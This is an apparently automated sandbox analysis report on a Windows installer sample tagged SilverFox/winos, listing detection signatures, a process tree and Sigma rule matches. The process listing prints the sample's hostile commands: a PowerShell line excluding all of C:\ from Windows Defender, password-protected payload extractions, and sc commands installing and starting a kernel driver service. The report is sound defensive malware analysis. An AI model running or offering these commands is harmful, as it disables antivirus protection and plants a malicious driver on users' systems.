Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U5b89#U88c5#U52a9#U624b_1.0.8.exe

Overview

General Information

Sample name:#U5b89#U88c5#U52a9#U624b_1.0.8.exe
renamed because original name is a hash value
Original sample name:_1.0.8.exe
Analysis ID:1579603
MD5:eb985a9c4c8c2ddc4b039f64b520fca9
SHA1:c96d6e0868dd3248261232bd53943abfa074ffce
SHA256:830caf16e52e098717a16ce8b2bda28f9a268746be2c77a6098e83941067b31c
Tags:exeSilverFoxwinosuser-kafan_shengui
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b_1.0.8.exe (PID: 2916 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe" MD5: EB985A9C4C8C2DDC4B039F64B520FCA9)
    • #U5b89#U88c5#U52a9#U624b_1.0.8.tmp (PID: 4464 cmdline: "C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp" /SL5="$302A6,4752846,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe" MD5: 9902FA6D39184B87AED7D94A037912D8)
      • powershell.exe (PID: 4284 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 7760 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b_1.0.8.exe (PID: 3132 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe" /VERYSILENT MD5: EB985A9C4C8C2DDC4B039F64B520FCA9)
        • #U5b89#U88c5#U52a9#U624b_1.0.8.tmp (PID: 928 cmdline: "C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp" /SL5="$20456,4752846,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe" /VERYSILENT MD5: 9902FA6D39184B87AED7D94A037912D8)
          • 7zr.exe (PID: 5776 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 7180 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 560 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2908 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7260 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7276 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7292 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7320 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7372 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7396 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7448 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7464 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7516 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7532 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7576 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7592 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7644 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7656 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7708 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7724 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7752 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7788 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7868 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7888 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7944 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7960 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8008 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8028 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8076 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8100 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8148 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8164 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4464 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7176 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7256 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7244 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7272 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7288 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7284 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7324 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7372 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7408 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7448 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7512 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7524 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7572 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7576 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7616 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7644 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7696 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7796 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7724 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7816 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7824 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7916 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7932 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7988 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7996 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8068 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8060 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8112 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8124 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8088 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2916 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4464 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5776 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4544 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7232 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7264 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp" /SL5="$302A6,4752846,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp, ParentProcessId: 4464, ParentProcessName: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 4284, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 560, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 2908, ProcessName: sc.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp" /SL5="$302A6,4752846,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp, ParentProcessId: 4464, ParentProcessName: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 4284, ProcessName: powershell.exe
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 560, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 2908, ProcessName: sc.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp" /SL5="$302A6,4752846,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp, ParentProcessId: 4464, ParentProcessName: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 4284, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 89.7% probability
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000B.00000003.1818402436.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000B.00000003.1818525168.0000000003180000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.11.dr
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpCode function: 5_2_6C9FAEC0 FindFirstFileA,FindClose,FindClose,5_2_6C9FAEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00A66868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,9_2_00A66868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00A67496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,9_2_00A67496
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000001.00000003.1772847528.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.8.tmp, 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, update.vac.5.dr, hrsw.vbc.5.dr, 7zr.exe.5.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
